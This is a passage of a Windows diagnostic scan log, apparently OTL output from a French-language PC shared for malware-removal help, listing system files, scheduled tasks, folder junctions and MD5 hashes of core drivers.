[2017/11/27 21:24:47 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\{AB7A4789-7A60-8D6C-96F4-4D21702EC7BD}
[2017/11/27 21:24:52 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\{ABD4AF09-45DC-F830-0DF0-378C354ED351}
[2017/11/27 21:24:33 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\{AC604F4A-5C8B-58C8-1BCC-EAD9EAB29D5E}
[2018/01/20 21:51:53 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\{ACF41228-28D2-497C-AD8F-19005413E49D}
[2017/11/27 21:24:59 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\{AEB730BE-17B3-2FA0-9D64-78CD3939C60A}
[2017/12/06 17:15:11 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\{B1DF8BD4-F712-4531-9B10-612218B26E5F}
[2017/11/27 21:25:08 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\{B4F57945-FCAA-121C-A52E-C2B3566E481E}
[2016/05/31 13:22:53 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\{B61BC343-F4F2-40F8-8F85-E6AF3828CBA5}
[2018/02/03 11:35:18 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\{C3F383C1-D050-4A40-843F-8171A6A02C3A}
[2017/11/27 21:24:46 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\{C715FF52-CBA8-780F-EFD8-5DF5525DBF74}
[2017/11/27 21:25:02 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\{CF6C9984-8F22-00D5-BA0A-F1330035A80E}
[2017/11/27 21:24:57 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\{D6477FB5-3F2F-A7C9-38F7-2FD0E79722B5}
[2017/12/28 12:29:35 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\{D72920C1-EAEA-4EA7-971F-58090EBC0C91}
[2017/11/27 21:24:55 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\{D7768225-15B9-F34E-82BD-883CEBE30132}
[2016/02/16 16:06:39 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\{D9C50188-12D5-4D3E-8F00-682346C2AA5F}
[2015/12/03 08:43:56 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\{D9FCBAAE-DB72-488B-96D0-0AA3C892C0D6}
[2016/01/18 16:42:37 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\{DCB1B348-C94E-4D6D-8CE0-7D9DA5CF663E}
[2017/07/10 20:25:32 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\{DEE88727-779B-47A9-ACEF-F87CA5F92A65}
[2017/11/27 21:24:45 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\{E2F0AF23-FE2F-4222-9A43-55E63CC41EF1}
[2017/01/31 18:15:37 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\{E703613B-BDAB-433E-A66A-DE0263E3D35D}
[2016/07/03 12:20:39 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\{E80C09B5-A296-47E9-BD4B-BCCF2FDCA13E}
[2017/11/27 21:24:48 | 000,000,000 | ---D | M] -- C:\WINDOWS\Installer\{FE5683A6-BA08-6417-4F85-96F787B1614E}

[color=#A23BEC]< %Systemroot%\Temp\*.exe /s >[/color]

[color=#A23BEC]< %systemroot%\system32\*.dll /lockedfiles >[/color]

[color=#A23BEC]< %systemroot%\system32\*.exe /lockedfiles >[/color]

[color=#A23BEC]< %systemroot%\system32\*.in* >[/color]
[2007/08/02 13:04:04 | 000,003,086 | ---- | M] () -- C:\WINDOWS\system32\EAPPkt.inf
[2018/02/10 04:42:25 | 000,003,329 | ---- | M] () -- C:\WINDOWS\system32\ieuinit.inf
[2017/09/29 14:43:19 | 000,014,848 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\system32\Microsoft.Management.Infrastructure.Native.Unmanaged.dll
[2017/09/29 14:42:13 | 000,002,307 | ---- | M] () -- C:\WINDOWS\system32\WimBootCompress.ini
[2017/09/29 14:42:09 | 000,582,656 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\system32\Windows.Gaming.Input.dll
[2018/03/30 04:41:16 | 000,430,080 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\system32\Windows.Internal.Bluetooth.dll
[2017/09/29 14:42:11 | 000,516,608 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\system32\Windows.Internal.Management.dll
[2017/09/29 14:41:21 | 000,040,960 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\system32\Windows.Internal.SecurityMitigationsBroker.dll
[2017/09/29 14:42:14 | 000,115,200 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\system32\Windows.Internal.UI.Logon.ProxyStub.dll
[2017/12/14 02:39:28 | 000,618,496 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\system32\Windows.Mirage.Internal.dll
[2017/09/29 14:42:09 | 003,383,296 | ---- | M] () -- C:\WINDOWS\system32\Windows.UI.Input.Inking.Analysis.dll
[2017/12/14 02:39:21 | 001,321,472 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\system32\Windows.UI.Input.Inking.dll
[2017/09/29 14:42:09 | 000,720,896 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\system32\Windows.UI.Xaml.InkControls.dll

[color=#A23BEC]< %systemroot%\PSS\* /s >[/color]
[2018/05/10 14:52:38 | 000,045,056 | ---- | M] () -- C:\WINDOWS\PSS\boot.backup
[2018/05/10 14:52:38 | 000,045,056 | -HS- | M] () -- C:\WINDOWS\PSS\boot.backup.LOG
[2018/05/10 14:52:38 | 000,000,000 | -HS- | M] () -- C:\WINDOWS\PSS\boot.backup.LOG1
[2018/05/10 14:52:38 | 000,000,000 | -HS- | M] () -- C:\WINDOWS\PSS\boot.backup.LOG2

[color=#A23BEC]< %systemroot%\Tasks\* >[/color]
[2018/12/31 09:58:46 | 000,000,006 | -H-- | M] () -- C:\WINDOWS\Tasks\SA.DAT
[2018/12/27 09:45:52 | 000,000,300 | ---- | M] () -- C:\WINDOWS\Tasks\SOVqgpLsuXhFCxp.job
[2018/08/17 12:03:30 | 000,000,570 | ---- | M] () -- C:\WINDOWS\Tasks\Yahoo! Powered dedar.job

[color=#A23BEC]< %systemroot%\Tasks\*. >[/color]
[2017/04/14 18:32:13 | 000,000,000 | ---D | M] -- C:\WINDOWS\Tasks\ImCleanDisabled

[color=#A23BEC]< %systemroot%\system32\Tasks\* >[/color]

[color=#A23BEC]< %systemroot%\system32\Tasks\*. >[/color]
[2017/09/29 14:46:34 | 000,000,000 | ---D | M] -- C:\WINDOWS\system32\Tasks\Microsoft

[color=#A23BEC]< %systemroot%\syswow64\Tasks\* >[/color]

[color=#A23BEC]< %systemroot%\syswow64\Tasks\*. >[/color]
[2017/09/29 14:46:34 | 000,000,000 | ---D | M] -- C:\WINDOWS\syswow64\Tasks\Microsoft

[color=#A23BEC]< %systemroot%\system32\drivers\*.sy* /lockedfiles >[/color]

[color=#A23BEC]< %systemroot%\system32\config\*.exe /s >[/color]

[color=#A23BEC]< %Systemroot%\ServiceProfiles\*.exe /s >[/color]

[color=#A23BEC]< %systemroot%\system32\*.sys >[/color]
[2005/01/03 07:43:08 | 000,004,682 | ---- | M] (INCA Internet Co., Ltd.) -- C:\WINDOWS\system32\npptNT2.sys
[2017/09/29 14:42:09 | 000,303,104 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\system32\win32k.sys
[2018/03/30 04:46:30 | 002,902,528 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\system32\win32kfull.sys

[color=#A23BEC]< dir %Homedrive%\* /S /A:L /C >[/color]
Le volume dans le lecteur C n'a pas de nom.
Le num ro de s rie du volume est F65D-E52A
R pertoire de C:\
14/07/2009 06:08 <JUNCTION> Documents and Settings [C:\Users]
0 fichier(s) 0 octets
R pertoire de C:\Program Files
01/12/2015 16:29 <JUNCTION> Fichiers communs [C:\Program Files\Common Files]
0 fichier(s) 0 octets
R pertoire de C:\Program Files\windows nt
04/05/2018 09:27 <JUNCTION> Accessoires [C:\Program Files\Windows NT\Accessories]
0 fichier(s) 0 octets
R pertoire de C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_17.10314.31700.1000_x64__8wekyb3d8bbwe\VFS
08/09/2018 13:09 <DIR> ProgramFilesCommonX64
08/09/2018 13:09 <DIR> SystemX64
0 fichier(s) 0 octets
R pertoire de C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_17.10314.31700.1000_x64__8wekyb3d8bbwe\VFS\ProgramFilesCommonX64
08/09/2018 13:09 <DIR> Microsoft Shared
0 fichier(s) 0 octets
R pertoire de C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_17.10314.31700.1000_x64__8wekyb3d8bbwe\VFS\ProgramFilesCommonX64\Microsoft Shared
08/09/2018 13:09 <DIR> DW
08/09/2018 13:09 <DIR> OFFICE16
0 fichier(s) 0 octets
R pertoire de C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_17.10314.31700.1000_x64__8wekyb3d8bbwe\VFS\ProgramFilesCommonX64\Microsoft Shared\OFFICE16
08/09/2018 13:09 <DIR> 1033
08/09/2018 13:09 <DIR> Cultures
0 fichier(s) 0 octets
R pertoire de C:\Program Files (x86)\Common Files\AV
18/05/2017 07:22 <SYMLINKD> avast! Antivirus [C:\Program Files\Common Files\AV\avast! Antivirus]
0 fichier(s) 0 octets
R pertoire de C:\ProgramData
04/05/2018 09:27 <JUNCTION> Application Data [C:\ProgramData]
01/12/2015 16:29 <JUNCTION> Bureau [C:\Users\Public\Desktop]
04/05/2018 09:27 <JUNCTION> Documents [C:\Users\Public\Documents]
01/12/2015 16:29 <JUNCTION> Favoris [C:\Users\Public\Favorites]
01/12/2015 16:29 <JUNCTION> Menu D marrer [C:\ProgramData\Microsoft\Windows\Start Menu]
01/12/2015 16:29 <JUNCTION> Mod`les [C:\ProgramData\Microsoft\Windows\Templates]
0 fichier(s) 0 octets
R pertoire de C:\ProgramData\Microsoft\Windows\Start Menu
01/12/2015 16:29 <JUNCTION> Programmes [C:\ProgramData\Microsoft\Windows\Start Menu\Programs]
0 fichier(s) 0 octets
R pertoire de C:\ProgramData\Oracle\Java
01/10/2017 11:12 <JUNCTION> javapath [C:\ProgramData\Oracle\Java\javapath_target_15582703]
0 fichier(s) 0 octets
R pertoire de C:\Users
29/09/2017 15:15 <SYMLINKD> All Users [C:\ProgramData]
29/09/2017 15:15 <JUNCTION> Default User [C:\Users\Default]
0 fichier(s) 0 octets
R pertoire de C:\Users\Administrateur
04/05/2018 09:08 <JUNCTION> Application Data [C:\Users\Administrateur\AppData\Roaming]
04/05/2018 09:08 <JUNCTION> Cookies [C:\Users\Administrateur\AppData\Local\Microsoft\Windows\INetCookies]
04/05/2018 09:08 <JUNCTION> Local Settings [C:\Users\Administrateur\AppData\Local]
04/05/2018 09:08 <JUNCTION> Menu D marrer [C:\Users\Administrateur\AppData\Roaming\Microsoft\Windows\Start Menu]
04/05/2018 09:08 <JUNCTION> Mes documents [C:\Users\Administrateur\Documents]
04/05/2018 09:08 <JUNCTION> Mod`les [C:\Users\Administrateur\AppData\Roaming\Microsoft\Windows\Templates]
04/05/2018 09:08 <JUNCTION> Recent [C:\Users\Administrateur\AppData\Roaming\Microsoft\Windows\Recent]
04/05/2018 09:08 <JUNCTION> SendTo [C:\Users\Administrateur\AppData\Roaming\Microsoft\Windows\SendTo]
04/05/2018 09:08 <JUNCTION> Voisinage d'impression [C:\Users\Administrateur\AppData\Roaming\Microsoft\Windows\Printer Shortcuts]
04/05/2018 09:08 <JUNCTION> Voisinage r seau [C:\Users\Administrateur\AppData\Roaming\Microsoft\Windows\Network Shortcuts]
0 fichier(s) 0 octets
R pertoire de C:\Users\Administrateur\AppData\Local
04/05/2018 09:08 <JUNCTION> Application Data [C:\Users\Administrateur\AppData\Local]
04/05/2018 09:08 <JUNCTION> Historique [C:\Users\Administrateur\AppData\Local\Microsoft\Windows\History]
04/05/2018 09:08 <JUNCTION> Temporary Internet Files [C:\Users\Administrateur\AppData\Local\Microsoft\Windows\INetCache]
0 fichier(s) 0 octets
R pertoire de C:\Users\Administrateur\AppData\Local\Microsoft\Windows
04/05/2018 09:08 <JUNCTION> Temporary Internet Files [C:\Users\Administrateur\AppData\Local\Microsoft\Windows\INetCache]
0 fichier(s) 0 octets
R pertoire de C:\Users\Administrateur\AppData\Local\Microsoft\Windows\INetCache
27/10/2018 21:36 <JUNCTION> Content.IE5 [C:\Users\Administrateur\AppData\Local\Microsoft\Windows\INetCache\IE]
0 fichier(s) 0 octets
R pertoire de C:\Users\Administrateur\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe
27/10/2018 21:37 <DIR> LocalCache
0 fichier(s) 0 octets
R pertoire de C:\Users\Administrateur\AppData\Roaming\Microsoft\Windows\Start Menu
04/05/2018 09:08 <JUNCTION> Programmes [C:\Users\Administrateur\AppData\Roaming\Microsoft\Windows\Start Menu\Programs]
0 fichier(s) 0 octets
R pertoire de C:\Users\Administrateur\Documents
04/05/2018 09:08 <JUNCTION> Ma musique [C:\Users\Administrateur\Music]
04/05/2018 09:08 <JUNCTION> Mes images [C:\Users\Administrateur\Pictures]
04/05/2018 09:08 <JUNCTION> Mes vid os [C:\Users\Administrateur\Videos]
0 fichier(s) 0 octets
R pertoire de C:\Users\All Users
04/05/2018 09:27 <JUNCTION> Application Data [C:\ProgramData]
01/12/2015 16:29 <JUNCTION> Bureau [C:\Users\Public\Desktop]
04/05/2018 09:27 <JUNCTION> Documents [C:\Users\Public\Documents]
01/12/2015 16:29 <JUNCTION> Favoris [C:\Users\Public\Favorites]
01/12/2015 16:29 <JUNCTION> Menu D marrer [C:\ProgramData\Microsoft\Windows\Start Menu]
01/12/2015 16:29 <JUNCTION> Mod`les [C:\ProgramData\Microsoft\Windows\Templates]
0 fichier(s) 0 octets
R pertoire de C:\Users\All Users\Microsoft\Windows\Start Menu
01/12/2015 16:29 <JUNCTION> Programmes [C:\ProgramData\Microsoft\Windows\Start Menu\Programs]
0 fichier(s) 0 octets
R pertoire de C:\Users\All Users\Oracle\Java
01/10/2017 11:12 <JUNCTION> javapath [C:\ProgramData\Oracle\Java\javapath_target_15582703]
0 fichier(s) 0 octets
R pertoire de C:\Users\Default
04/05/2018 09:27 <JUNCTION> Application Data [C:\Users\Default\AppData\Roaming]
04/05/2018 09:27 <JUNCTION> Cookies [C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies]
04/05/2018 09:27 <JUNCTION> Local Settings [C:\Users\Default\AppData\Local]
03/12/2015 11:04 <JUNCTION> Menu D marrer [C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu]
03/12/2015 11:04 <JUNCTION> Mes documents [C:\Users\Default\Documents]
03/12/2015 11:04 <JUNCTION> Mod`les [C:\Users\Default\AppData\Roaming\Microsoft\Windows\Templates]
04/05/2018 09:27 <JUNCTION> Recent [C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent]
04/05/2018 09:27 <JUNCTION> SendTo [C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo]
03/12/2015 11:04 <JUNCTION> Voisinage d'impression [C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts]
03/12/2015 11:04 <JUNCTION> Voisinage r seau [C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts]
0 fichier(s) 0 octets
R pertoire de C:\Users\Default\AppData\Local
04/05/2018 09:27 <JUNCTION> Application Data [C:\Users\Default\AppData\Local]
03/12/2015 11:04 <JUNCTION> Historique [C:\Users\Default\AppData\Local\Microsoft\Windows\History]
04/05/2018 09:27 <JUNCTION> Temporary Internet Files [C:\Users\Default\AppData\Local\Microsoft\Windows\INetCache]
0 fichier(s) 0 octets
R pertoire de C:\Users\Default\AppData\Local\Microsoft\Windows
04/05/2018 09:27 <JUNCTION> Temporary Internet Files [C:\Users\Default\AppData\Local\Microsoft\Windows\INetCache]
0 fichier(s) 0 octets
R pertoire de C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu
04/05/2018 09:27 <JUNCTION> Programmes [C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs]
0 fichier(s) 0 octets
R pertoire de C:\Users\Default\Documents
04/05/2018 09:27 <JUNCTION> Ma musique [C:\Users\Default\Music]
04/05/2018 09:27 <JUNCTION> Mes images [C:\Users\Default\Pictures]
04/05/2018 09:27 <JUNCTION> Mes vid os [C:\Users\Default\Videos]
0 fichier(s) 0 octets
R pertoire de C:\Users\Public\Documents
01/12/2015 16:29 <JUNCTION> Ma musique [C:\Users\Public\Music]
01/12/2015 16:29 <JUNCTION> Mes images [C:\Users\Public\Pictures]
01/12/2015 16:29 <JUNCTION> Mes vid os [C:\Users\Public\Videos]
14/07/2009 06:08 <JUNCTION> My Music [C:\Users\Public\Music]
14/07/2009 06:08 <JUNCTION> My Pictures [C:\Users\Public\Pictures]
14/07/2009 06:08 <JUNCTION> My Videos [C:\Users\Public\Videos]
0 fichier(s) 0 octets
R pertoire de C:\Users\Thinkcentre
04/05/2018 09:08 <JUNCTION> Application Data [C:\Users\Thinkcentre\AppData\Roaming]
04/05/2018 09:08 <JUNCTION> Cookies [C:\Users\Thinkcentre\AppData\Local\Microsoft\Windows\INetCookies]
04/05/2018 09:08 <JUNCTION> Local Settings [C:\Users\Thinkcentre\AppData\Local]
04/05/2018 09:08 <JUNCTION> Menu D marrer [C:\Users\Thinkcentre\AppData\Roaming\Microsoft\Windows\Start Menu]
04/05/2018 09:08 <JUNCTION> Mes documents [C:\Users\Thinkcentre\Documents]
04/05/2018 09:08 <JUNCTION> Mod`les [C:\Users\Thinkcentre\AppData\Roaming\Microsoft\Windows\Templates]
04/05/2018 09:08 <JUNCTION> Recent [C:\Users\Thinkcentre\AppData\Roaming\Microsoft\Windows\Recent]
04/05/2018 09:08 <JUNCTION> SendTo [C:\Users\Thinkcentre\AppData\Roaming\Microsoft\Windows\SendTo]
04/05/2018 09:08 <JUNCTION> Voisinage d'impression [C:\Users\Thinkcentre\AppData\Roaming\Microsoft\Windows\Printer Shortcuts]
04/05/2018 09:08 <JUNCTION> Voisinage r seau [C:\Users\Thinkcentre\AppData\Roaming\Microsoft\Windows\Network Shortcuts]
0 fichier(s) 0 octets
R pertoire de C:\Users\Thinkcentre\AppData\Local
04/05/2018 09:08 <JUNCTION> Application Data [C:\Users\Thinkcentre\AppData\Local]
04/05/2018 09:08 <JUNCTION> Historique [C:\Users\Thinkcentre\AppData\Local\Microsoft\Windows\History]
04/05/2018 09:08 <JUNCTION> Temporary Internet Files [C:\Users\Thinkcentre\AppData\Local\Microsoft\Windows\INetCache]
0 fichier(s) 0 octets
R pertoire de C:\Users\Thinkcentre\AppData\Local\Microsoft\Windows
04/05/2018 09:08 <JUNCTION> Temporary Internet Files [C:\Users\Thinkcentre\AppData\Local\Microsoft\Windows\INetCache]
0 fichier(s) 0 octets
R pertoire de C:\Users\Thinkcentre\AppData\Local\Microsoft\Windows\INetCache
04/05/2018 09:29 <JUNCTION> Content.IE5 [C:\Users\Thinkcentre\AppData\Local\Microsoft\Windows\INetCache\IE]
0 fichier(s) 0 octets
R pertoire de C:\Users\Thinkcentre\AppData\Local\Microsoft\Windows\INetCache\Low
17/05/2018 09:31 <JUNCTION> Content.IE5 [C:\Users\Thinkcentre\AppData\Local\Microsoft\Windows\INetCache\Low\IE]
0 fichier(s) 0 octets
R pertoire de C:\Users\Thinkcentre\AppData\Local\Packages\Microsoft.Microsoft3DViewer_8wekyb3d8bbwe
04/05/2018 09:52 <DIR> LocalCache
0 fichier(s) 0 octets
R pertoire de C:\Users\Thinkcentre\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe
04/05/2018 09:52 <DIR> LocalCache
0 fichier(s) 0 octets
R pertoire de C:\Users\Thinkcentre\Documents
04/05/2018 09:08 <JUNCTION> Ma musique [C:\Users\Thinkcentre\Music]
04/05/2018 09:08 <JUNCTION> Mes images [C:\Users\Thinkcentre\Pictures]
04/05/2018 09:08 <JUNCTION> Mes vid os [C:\Users\Thinkcentre\Videos]
0 fichier(s) 0 octets
R pertoire de C:\Windows\ServiceProfiles\LocalService\AppData\Local\Microsoft\Windows\INetCache
23/12/2018 19:42 <JUNCTION> Content.IE5 [C:\WINDOWS\ServiceProfiles\LocalService\AppData\Local\Microsoft\Windows\INetCache\IE]
0 fichier(s) 0 octets
R pertoire de C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache
08/05/2018 20:16 <JUNCTION> Content.IE5 [C:\WINDOWS\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE]
0 fichier(s) 0 octets
R pertoire de C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache
08/05/2018 20:16 <JUNCTION> Content.IE5 [C:\WINDOWS\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE]
0 fichier(s) 0 octets
Total des fichiers list sÿ:
0 fichier(s) 0 octets
97 R p(s) 11ÿ737ÿ014ÿ272 octets libres

[color=#A23BEC]< MD5 for: AFD.SYS >[/color]
[2018/03/30 05:48:43 | 000,614,304 | ---- | M] (Microsoft Corporation) MD5=9619C0D7DB55CC3A636A24A7D82B0C8E -- C:\WINDOWS\SysNative\drivers\afd.sys
[2018/03/30 05:48:43 | 000,614,304 | ---- | M] (Microsoft Corporation) MD5=9619C0D7DB55CC3A636A24A7D82B0C8E -- C:\Windows\WinSxS\amd64_microsoft-windows-winsock-core_31bf3856ad364e35_10.0.16299.371_none_e5508fd9c95136c1\afd.sys
[2018/05/20 10:43:54 | 000,023,849 | ---- | M] () MD5=F9608E1224F6E51B23ACF4E33ED089A0 -- C:\Windows\WinSxS\amd64_microsoft-windows-winsock-core_31bf3856ad364e35_10.0.16299.15_none_fad46e84cf91927a\afd.sys

[color=#A23BEC]< MD5 for: ATAPI.SYS >[/color]
[2017/09/29 14:41:03 | 000,028,568 | ---- | M] (Microsoft Corporation) MD5=6191B9B2EE0E8CB957C683B9B341CC86 -- C:\WINDOWS\SysNative\drivers\atapi.sys
[2017/09/29 14:41:03 | 000,028,568 | ---- | M] (Microsoft Corporation) MD5=6191B9B2EE0E8CB957C683B9B341CC86 -- C:\WINDOWS\SysNative\DriverStore\FileRepository\mshdc.inf_amd64_d0125efb9153d084\atapi.sys
[2017/09/29 14:41:03 | 000,028,568 | ---- | M] (Microsoft Corporation) MD5=6191B9B2EE0E8CB957C683B9B341CC86 -- C:\Windows\WinSxS\amd64_mshdc.inf_31bf3856ad364e35_10.0.16299.251_none_eab613538c5db104\atapi.sys
[2018/06/19 19:34:11 | 000,000,012 | ---- | M] () MD5=EE363E744D3889221B2BD4F6F30843FD -- C:\Windows\WinSxS\amd64_mshdc.inf_31bf3856ad364e35_10.0.16299.15_none_0024540c92ae41c6\atapi.sys

[color=#A23BEC]< MD5 for: CDROM.SYS >[/color]
[2017/09/29 14:41:02 | 000,159,744 | ---- | M] (Microsoft Corporation) MD5=6D83565C1652E80447EDEA6947FA89D7 -- C:\WINDOWS\SysNative\drivers\cdrom.sys
[2017/09/29 14:41:02 | 000,159,744 | ---- | M] (Microsoft Corporation) MD5=6D83565C1652E80447EDEA6947FA89D7 -- C:\WINDOWS\SysNative\DriverStore\FileRepository\cdrom.inf_amd64_21e18060f597c313\cdrom.sys
[2017/09/29 14:41:02 | 000,159,744 | ---- | M] (Microsoft Corporation) MD5=6D83565C1652E80447EDEA6947FA89D7 -- C:\Windows\WinSxS\amd64_cdrom.inf_31bf3856ad364e35_10.0.16299.15_none_829587d514ebdd74\cdrom.sys

[color=#A23BEC]< MD5 for: EXPLORER.EXE >[/color]
[2018/02/10 07:09:53 | 003,904,296 | ---- | M] (Microsoft Corporation) MD5=A77D56422C38C1F8A00D95D2D5B1675E -- C:\Windows\explorer.exe
[2018/02/10 07:09:53 | 003,904,296 | ---- | M] (Microsoft Corporation) MD5=A77D56422C38C1F8A00D95D2D5B1675E -- C:\Windows\WinSxS\amd64_microsoft-windows-explorer_31bf3856ad364e35_10.0.16299.248_none_5f44643de481e697\explorer.exe
[2018/06/19 19:21:52 | 000,426,877 | ---- | M] () MD5=A91986694EF788C2C00996B906593CEE -- C:\Windows\WinSxS\amd64_microsoft-windows-explorer_31bf3856ad364e35_10.0.16299.15_none_74a0d304eae0e1e9\explorer.exe
[2018/06/19 19:40:33 | 000,325,372 | ---- | M] () MD5=D85FE89C06932A5179C571F7FD6C3985 -- C:\Windows\WinSxS\wow64_microsoft-windows-explorer_31bf3856ad364e35_10.0.16299.15_none_7ef57d571f41a3e4\explorer.exe
[2018/02/10 06:09:56 | 003,485,392 | ---- | M] (Microsoft Corporation) MD5=E79CC4B9A9EAA1E5D801742C093043A9 -- C:\Windows\SysWOW64\explorer.exe
[2018/02/10 06:09:56 | 003,485,392 | ---- | M] (Microsoft Corporation) MD5=E79CC4B9A9EAA1E5D801742C093043A9 -- C:\Windows\WinSxS\wow64_microsoft-windows-explorer_31bf3856ad364e35_10.0.16299.248_none_69990e9018e2a892\explorer.exe

[color=#A23BEC]< MD5 for: I8042PRT.SYS >[/color]
[2017/09/29 14:41:08 | 000,105,984 | ---- | M] (Microsoft Corporation) MD5=56FF074E50F9042FD2856AB3418F4B18 -- C:\WINDOWS\SysNative\drivers\i8042prt.sys
[2017/09/29 14:41:08 | 000,105,984 | ---- | M] (Microsoft Corporation) MD5=56FF074E50F9042FD2856AB3418F4B18 -- C:\WINDOWS\SysNative\DriverStore\FileRepository\keyboard.inf_amd64_604ef8d09f87f339\i8042prt.sys
[2017/09/29 14:41:08 | 000,105,984 | ---- | M] (Microsoft Corporation) MD5=56FF074E50F9042FD2856AB3418F4B18 -- C:\Windows\WinSxS\amd64_dual_keyboard.inf_31bf3856ad364e35_10.0.16299.15_none_2f13b274aac1f357\i8042prt.sys

[color=#A23BEC]< MD5 for: NDIS.SYS >[/color]
[2018/03/30 06:03:41 | 001,277,856 | ---- | M] (Microsoft Corporation) MD5=25D126EFFEC0B117DA4C81F7AE6C99FC -- C:\WINDOWS\SysNative\drivers\ndis.sys
[2018/03/30 06:03:41 | 001,277,856 | ---- | M] (Microsoft Corporation) MD5=25D126EFFEC0B117DA4C81F7AE6C99FC -- C:\Windows\WinSxS\amd64_microsoft-windows-ndis-minwin_31bf3856ad364e35_10.0.16299.371_none_66bdcb7c92f0232e\ndis.sys
[2018/06/19 19:28:33 | 000,075,976 | ---- | M] () MD5=5676A5422DEF8F5C06A57D53ECE35C2E -- C:\Windows\WinSxS\amd64_microsoft-windows-ndis-minwin_31bf3856ad364e35_10.0.16299.15_none_7c41aa2799307ee7\ndis.sys

[color=#A23BEC]< MD5 for: NETBT.SYS >[/color]
[2018/05/20 10:27:12 | 000,001,218 | ---- | M] () MD5=124F2DA8E763CE305B4B5E1A536DB9E1 -- C:\Windows\WinSxS\amd64_microsoft-windows-netbt-minwin_31bf3856ad364e35_10.0.16299.15_none_0e98ad3449043908\netbt.sys
[2018/03/30 04:31:24 | 000,316,928 | ---- | M] (Microsoft Corporation) MD5=E5C5E6ED3949546E2ACA79B6A3817202 -- C:\WINDOWS\SysNative\drivers\netbt.sys
[2018/03/30 04:31:24 | 000,316,928 | ---- | M] (Microsoft Corporation) MD5=E5C5E6ED3949546E2ACA79B6A3817202 -- C:\Windows\WinSxS\amd64_microsoft-windows-netbt-minwin_31bf3856ad364e35_10.0.16299.371_none_f914ce8942c3dd4f\netbt.sys

[color=#A23BEC]< MD5 for: TDX.SYS >[/color]
[2018/03/30 05:57:54 | 000,121,248 | ---- | M] (Microsoft Corporation) MD5=09125A12CAB5F8D5EAE9C83C25792FDD -- C:\WINDOWS\SysNative\drivers\tdx.sys
[2018/03/30 05:57:54 | 000,121,248 | ---- | M] (Microsoft Corporation) MD5=09125A12CAB5F8D5EAE9C83C25792FDD -- C:\Windows\WinSxS\amd64_microsoft-windows-tdi-over-tcpip_31bf3856ad364e35_10.0.16299.371_none_f7a6159346f9c028\tdx.sys
[2018/05/20 10:41:18 | 000,002,785 | ---- | M] () MD5=509E90794CEF0F6664AB216579C08B3E -- C:\Windows\WinSxS\amd64_microsoft-windows-tdi-over-tcpip_31bf3856ad364e35_10.0.16299.15_none_0d29f43e4d3a1be1\tdx.sys

[color=#A23BEC]< MD5 for: VOLSNAP.SYS >[/color]
[2017/12/14 02:53:53 | 000,010,046 | ---- | M] () MD5=424EB7711A8EB0CF1412D9799C60A581 -- C:\Windows\WinSxS\amd64_microsoft-windows-volsnap_31bf3856ad364e35_10.0.16299.15_none_8216217b1294b2f1\volsnap.sys
[2017/12/14 02:39:21 | 000,401,304 | ---- | M] (Microsoft Corporation) MD5=5B27846CF4B1C21AFB3A35A8336BA02F -- C:\WINDOWS\SysNative\drivers\volsnap.sys
[2017/12/14 02:39:21 | 000,401,304 | ---- | M] (Microsoft Corporation) MD5=5B27846CF4B1C21AFB3A35A8336BA02F -- C:\Windows\WinSxS\amd64_microsoft-windows-volsnap_31bf3856ad364e35_10.0.16299.125_none_6ccc4fc80c283691\volsnap.sys

[color=#A23BEC]< MD5 for: WININIT.EXE >[/color]
[2017/09/29 14:41:43 | 000,359,584 | ---- | M] (Microsoft Corporation) MD5=BF3E1D9B2360C6BE4CC3094CD2DDC617 -- C:\WINDOWS\SysNative\wininit.exe
